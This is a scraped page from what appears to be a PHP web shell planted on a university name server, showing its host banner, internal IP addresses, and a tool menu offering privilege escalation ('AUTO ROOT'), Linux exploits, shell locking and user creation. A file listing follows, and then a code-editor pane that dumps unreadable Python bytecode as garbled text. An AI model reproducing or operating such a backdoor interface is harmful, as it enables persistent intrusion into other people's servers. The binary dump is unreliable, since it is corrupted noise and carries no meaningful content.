Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
python3 /
debpython /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
files.cpython-310.pyc
2.46
KB
-rw-r--r--
__init__.cpython-310.pyc
1.97
KB
-rw-r--r--
interpreter.cpython-310.pyc
10.08
KB
-rw-r--r--
option.cpython-310.pyc
1019
B
-rw-r--r--
version.cpython-310.pyc
12.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : interpreter.cpython-310.pyc
o 年f�4 � @ sx d dl Z d dlZd dlZd dlmZmZ d dlmZ d dlm Z e� dej�Ze� dej�Z e �e�ZG dd� d�ZdS ) � N)�join�split)�execute)�Versionz� (?:\#!\s*){0,1} # shebang prefix (?P<path> .*?/bin/.*?)? (?P<name> python|pypy) (?P<version> \d[\.\d]*)? (?P<debug> -dbg)? (?P<options>.*) a- (?P<name>.*?) (?:\. (?P<stableabi>abi\d+) |(?:\. (?P<soabi> (?P<impl>cpython|pypy) - (?P<ver>\d{2}) (?P<flags>[a-z]*?) ) (?: -(?P<multiarch>[^/]*?) )? ))? (?P<debug>_d)? \.so$c @ s� e Zd ZdZdZdZdZdZdZi Z d)dd�Z dd � Zd d� Zdd � Z dd� Zedd� �Zd*dd�Zd+dd�Zd+dd�Zd+dd�Zd+dd�Zd+dd�Zd+dd�Zd+d d!�Zd+d"d#�Zd+d$d%�Zd,d'd(�ZdS )-�InterpreterN�pythonF�cpython� c C s� t � }|d= |d= t|t�r#|�� D ]} || d u r!t|| �|| <